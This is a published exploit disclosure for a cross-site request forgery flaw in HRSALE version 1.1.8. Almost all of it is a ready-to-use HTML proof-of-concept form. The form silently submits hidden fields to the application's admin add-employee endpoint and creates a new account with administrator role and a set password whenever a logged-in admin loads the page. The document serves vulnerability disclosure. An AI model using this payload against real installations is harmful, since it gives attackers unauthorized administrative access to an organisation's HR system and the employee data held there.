# Exploit Title: HRSALE 1.1.8 - Cross-Site Request Forgery (Add Admin)
# Date: 2020-03-11
# Exploit Author: Ismail Akıcı
# Vendor Homepage: http://hrsale.com/
# Software Link : http://demo.hrsale.com/
# Software : HRSALE v1.1.8
# Product Version: v1.1.8
# Vulnerability Type : Cross-Site Request Forgery (Add Admin)
# Vulnerability : Cross-Site Request Forgery
# Description :
# CSRF vulnerability was discovered in v1.1.8 version of HRSALE.
# With this vulnerability, authorized users can be added to the system.
HTML CSRF PoC :
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://demo.hrsale.com/admin/employees/add_employee" method="POST" enctype="multipart/form-data">
<input type="hidden" name="_user" value="1" />
<input type="hidden" name="csrf_hrsale" value="e8ed76f1f2110f7244b58062e2209961" />
<input type="hidden" name="first_name" value="Ismail" />
<input type="hidden" name="last_name" value="Akici" />
<input type="hidden" name="company_id" value="1" />
<input type="hidden" name="location_id" value="1" />
<input type="hidden" name="username" value="ismailtakici" />
<input type="hidden" name="email" value="ismail.akici@gmail.com" />
<input type="hidden" name="date_of_birth" value="2020-03-11" />
<input type="hidden" name="contact_no" value="5554443322" />
<input type="hidden" name="employee_id" value="1" />
<input type="hidden" name="date_of_joining" value="2020-03-11" />
<input type="hidden" name="department_id" value="1" />
<input type="hidden" name="subdepartment_id" value="YES" />
<input type="hidden" name="designation_id" value="9" />
<input type="hidden" name="gender" value="Male" />
<input type="hidden" name="office_shift_id" value="1" />
<input type="hidden" name="password" value="Test1234!" />
<input type="hidden" name="confirm_password" value="Test1234!" />
<input type="hidden" name="role" value="1" />
<input type="hidden" name="leave_categories[]" value="0" />
<input type="hidden" name="leave_categories[]" value="1" />
<input type="hidden" name="address" value="Test Address" />
<input type="hidden" name="is_ajax" value="1" />
<input type="hidden" name="add_type" value="employee" />
<input type="hidden" name="form" value="add_employee" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>